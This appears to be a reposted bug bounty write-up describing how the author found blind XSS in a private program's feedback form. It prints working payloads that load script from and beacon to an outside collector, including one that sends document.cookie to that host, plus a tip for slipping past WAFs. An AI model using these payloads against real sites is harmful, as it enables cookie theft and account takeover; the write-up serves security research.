.png)
1 year ago
157 BOOK THIS SPACE FOR AD
ARTICLE ADWithout wasting any time, I try to keep everything to the point.
It’s a private program, so we call it www.target.com.
Vulnerable form: Feedback form on www.target.com
I use www.blindf.com to find the blind XSS. You can use your own VPS to receive the response.
My methodology to find the BXSS:
My experience says that the basic BXSS payload
“></script><script src=https://blindf.com/bx.php></script>
does not work many times. Also, any other payload that extracts dom or page source code doesn’t work many times. So to find the BXSS, I use blind HTML payloads
“><img src=’https://blindf.com/b.php?c=querytoremember'/>
in every text field. The reason behind using it is to fool the WAF or any other security implemented by the developer. Because this payload does not use any Javascript code or tags, it executes without any difficulty and sends a response to www.blindf.com upon execution. Once you receive the response, you can go ahead and test for BXSS.
How I found this bug:
I used BHTML payload“><img src=’https://blindf.com/b.php?c=querytoremember’>
in every text field of the feedback form on www.target.com/feedback.
After some days, www.blindf.com received a response from the vulnerable server.I went ahead and put the basic BXSS payload“></script><script src=https://blindf.com/bx.php></script>
to find the BXSS. Because at this point, I knew that the form was vulnerable.
I waited for 20 days but did not receive a response.Then I used a trick. I put blind HTML payload“><img src=’https://blindf.com/b.php?c=target_com_latestpayload'>
and submitted the form. I resubmitted the form with my basic BXSS payload too. It means I submitted the form twice, the first time with BHTML payload and the second time with a BXSS payload.
After some time, I received a response from my BHTML payload, but the BXSS payload did not send any response. I understand that my BXSS payload has failed and it will not send any response now. Because both payloads were submitted on the same day, they should be fired at the same time.www.blindf.com provides other payloads too, with a minimum JS execution. I used a different payload that only extracts cookies and not any DOM values from the page.Payload:-
“><img src=https://blindf.com/a.jpg onload=this.src=’https://test.blindf.com/oc.php/?c='+document.cookie>
This payload was executed and I received the basic cookie.Bug SubmittedTriager tried to reproduce the bug but failed. So he closed my bug as N/a.
So, after closing my bugs as N/a two times. I finally received the bounty.
Thank you for reading my boring stuff and tolerate my bad English
Bengali (Bangladesh) · 
English (United States) ·